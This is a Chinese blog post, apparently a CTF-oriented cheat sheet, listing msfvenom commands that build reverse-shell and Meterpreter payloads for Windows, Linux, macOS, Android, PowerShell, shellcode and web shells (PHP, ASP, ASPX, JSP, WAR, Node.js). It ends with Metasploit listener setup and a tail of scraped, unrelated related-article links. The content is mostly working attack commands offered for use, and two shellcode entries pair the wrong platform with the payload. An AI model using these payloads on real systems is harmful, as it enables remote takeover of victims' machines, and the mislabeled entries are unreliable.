前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

资源

一、payload

1.windwos

2.liunx

3.mac

4.android

5.Powershell

6.shellcode(windwos)

7.shellcode(liunx)

8.shellcode(mac)

二、反弹shell

1.python

2.bash

3.Perl

4.Lua

5.Ruby

6.php

7.aspx

8.asp

9.jsp

10.war

11.nodejs

三、监听


资源

msf生成payload大全_不知名白帽的博客-CSDN博客

一、payload

1.windwos

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f exe > shell.exe

2.liunx

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f elf > shell.elf

3.mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f macho > shell.macho

4.android

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 R > test.apk

5.Powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

6.shellcode(windwos)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Windows -f c

7.shellcode(liunx)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform Linux -f c

8.shellcode(mac)

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -a x86 --platform osx -f c

二、反弹shell

1.python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py

msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.py

2.bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.20.128 LPORT=4444 -f raw > shell.sh

3.Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.20.128 LPORT=4444 -f raw > shell.pl

4.Lua

msfvenom -p cmd/unix/reverse_lua LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.lua

5.Ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.rb

6.php

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

7.aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f aspx -o shell.aspx

8.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f asp > shell.asp

9.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw > shell.jsp

10.war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f war > shell.war

11.nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.20.128 LPORT=4444 -f raw -o shell.js

三、监听

use exploit/multi/handler

set PAYLOAD <Payload name>

set LHOST 192.168.20.128

set LPORT 4444

show options #查漏补缺

exploit

msf生成payload大全相关推荐

  1. msf生成linux shellcode,MSF-Shellcode生成和使用

    1使用環境 Kali 2.0 msfvenom 2Msfvenom參數說明 msfvenom �Ch    查看幫助 說明: Options: -p, --payload            指定需 ...

  2. python 生成payload_msf生成payload

    payload分类: 这里就分为正向木马和反向木马两类吧.咱知道的也有限,仅供参考... 反弹式木马简介: 反弹式shell(reverse shell)是一种从目标主机到攻击主机创建网络连接,并提供 ...

  3. msf常用payload

    msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用.生成payload使用的工具是MSFVenom ...

  4. msf注入payload

    msf注入payload bash 参考文章 bash use exploit/windows/local/payload_inject set payload windows/meterpreter ...

  5. 我的世界服务器修改怪物生成,我的世界阻止服务器怪物生成指令大全

    在我的世界游戏中,如果你是在玩服务器的话,你不想见到某种怪物,你就需要使用指令,下面小编就为大家整理出了我的世界阻止服务器怪物生成指令大全,希望大家喜欢! #+(true为是,false为否) spa ...

  6. 我的世界服务器修改生成怪物速度的文件,我的世界服务器禁止怪物生成指令大全...

    我的世界服务器禁止怪物生成指令大全 我的世界服务器禁止怪物生成指令大全.有没有小伙伴和小编一样对于我的世界中各式各样的怪物头疼不已呢?是的话,今天大家有福了,因为小编今天教大家如何在自建服务器中使用禁 ...

  7. msf生成php反弹,反弹shell总结

    1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 444 ...

  8. msf 生成.wsf 木马

    ** 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享! ** 首先了解wsf是啥语言,可参考文章如下: https://www.cnblogs.com/vitrox/p/51374 ...

  9. MSF生成木马及木马的简单使用

    0x00 前言 本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正. 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVE ...

最新文章

  1. 如何解决XML文件中的警告提示“No grammar constraints (DTD or XML Schema) referenced in the document.”...
  2. python语言程序设计2019版第二章课后答案-python语言程序设计基础(嵩天)第二章课后习题...
  3. gperf的学习笔记(一)
  4. ViewHolder VS HolderView ?
  5. android下raw目录的作用,Android 之 assets目录和raw目录
  6. javascript学习系列(9):原数组发生变化的情况
  7. js判断字符串中某个字母出现次数最多
  8. mysql中的默认表_MySQL中表的默认类型为( )。_学小易找答案
  9. 物联网传感技术——光纤传感器
  10. Android数据加密之——Base64编码算法
  11. 前嗅教你大数据:采集金融界论坛数据
  12. CME ERROR错误代码列表
  13. java声音变音代码实现_大话音频变声原理 附简单示例代码
  14. 云聚创新力量,助力多云互联:Tungsten Fabric在联通沃云峰会2019上分享开源SDN
  15. c语言c2056错误,C语言中文网_c.biancheng.net - 爱站网站排行榜
  16. Buffon投针实验
  17. 转载几篇别人写的皮肤类控件的技术文章
  18. ROS学习笔记(十)——ROS试用练习(一)
  19. 《Java核心技术卷一》读书笔记
  20. MATLAB画三维球体函数

热门文章

  1. 着陆页优化101招-第2章信任和安全
  2. JAVA内部类、外部类
  3. 数据中心服务器接入线缆选择,EOR/MOR
  4. python画动态表情包_python还可以这么玩(三)?
  5. 高数上复习第四五六章
  6. python解析文本
  7. Flutter中的HTTP网络请求与JSON序列化
  8. Windows10+Ubuntu16.04双系统安装
  9. maven的pom 文件scope和exclusion标签
  10. iOS小课堂: 集成 《阿里百川》教程( 打开商品详情页、 淘宝账号授权登录、 完成交易闭环)